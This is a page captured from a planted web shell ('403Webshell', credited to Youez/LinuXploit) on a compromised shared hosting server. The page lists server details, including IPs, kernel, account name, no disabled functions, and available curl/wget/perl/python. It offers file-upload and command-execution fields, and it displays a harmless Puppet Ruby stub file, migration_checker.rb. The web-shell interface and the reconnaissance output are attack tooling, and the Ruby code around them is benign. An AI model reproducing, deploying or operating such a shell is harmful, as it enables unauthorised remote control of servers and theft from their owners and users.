403Webshell
Server IP : 172.67.158.161  /  Your IP : 13.58.66.132
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet/pops/migration/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet/pops/migration/migration_checker.rb
# This class defines the private API of the MigrationChecker support.
# @api private
#
class Puppet::Pops::Migration::MigrationChecker

  def initialize()
  end

  def self.singleton
    @null_checker ||= self.new
  end

  # Produces a hash of available migrations; a map from a symbolic name in string form to a brief description.
  # This version has no such supported migrations.
  def available_migrations()
    { }
  end

  # For 3.8/4.0
  def report_ambiguous_integer(o)
    raise Puppet::DevError, _("Unsupported migration method called")
  end

  # For 3.8/4.0
  def report_ambiguous_float(o)
    raise Puppet::DevError, _("Unsupported migration method called")
  end

  # For 3.8/4.0
  def report_empty_string_true(value, o)
    raise Puppet::DevError, _("Unsupported migration method called")
  end

  # For 3.8/4.0
  def report_uc_bareword_type(value, o)
    raise Puppet::DevError, _("Unsupported migration method called")
  end

  # For 3.8/4.0
  def report_equality_type_mismatch(left, right, o)
    raise Puppet::DevError, _("Unsupported migration method called")
  end

  # For 3.8/4.0
  def report_option_type_mismatch(test_value, option_value, option_expr, matching_expr)
    raise Puppet::DevError, _("Unsupported migration method called")
  end

  # For 3.8/4.0
  def report_in_expression(o)
    raise Puppet::DevError, _("Unsupported migration method called")
  end

  # For 3.8/4.0
  def report_array_last_in_block(o)
    raise Puppet::DevError, _("Unsupported migration method called")
  end
end

Youez - 2016 - github.com/yon3zu
LinuXploit